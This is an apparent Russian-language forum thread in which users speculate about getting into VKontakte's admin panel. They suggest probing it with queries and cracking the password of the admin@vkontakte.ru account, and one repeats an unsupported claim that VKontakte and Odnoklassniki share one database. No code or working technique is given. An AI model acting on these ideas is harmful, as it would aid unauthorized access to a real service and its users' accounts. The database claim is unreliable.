скрипт проверяет, помечен ли в БД твой ид как админский. Если да, то тебе разрешается доступ в админку, скорее всего и ссылка в админку прям на странице появляется... Но в этой админке наверняка доступ открыть к крайне ограниченному набору ф-ий...

У сайта "однокласники" и "в контакте" одна база даных , думайте

я вот что думаю вот главный интерфейс он хорошо зашишён и там и фильтры и тому подобное есть ..... а вот в админку наверно не так сильно закрывают и можно попробовать какиенибуть запросы попробовать выполнить !!! к сожилению я в пхп не силен так что нечего конкретного посоветовать не могу ..... а вот тут наверняка кто то в этом шарит ... было бы интерестно послушать предложения !)

У сайта "однокласники" и "в контакте" одна база даных , думайте
на чем основано это утверждение? просто так сказал чтобы сказать или есть доказательство

на чем основано это утверждение? просто так сказал чтобы сказать или есть доказательство
есть доказательство . источник открывать не буду
Vkontakte.ru попробуйте мыло admin@vkontakte.ru ну и пас можно попробовать ломануть

ага, ну попробуй ломани мыло!!!
Расскажешь о результатах... =))

ага, ну попробуй ломани мыло!!!
Расскажешь о результатах... =))
не мыло а анкету

результат будет тот же- прилетит птица Обломинго=)

побаловался я с заменой инпута на текстареа и понял, что это можно использовать и с паролем(т.е. пароль можно сделать многострочным).

Блин, такой бред пишете 8)
Отписываюсь от этой темы нахрен 8)

"У сайта "однокласники" и "в контакте" одна база даных , думайте"

- автору.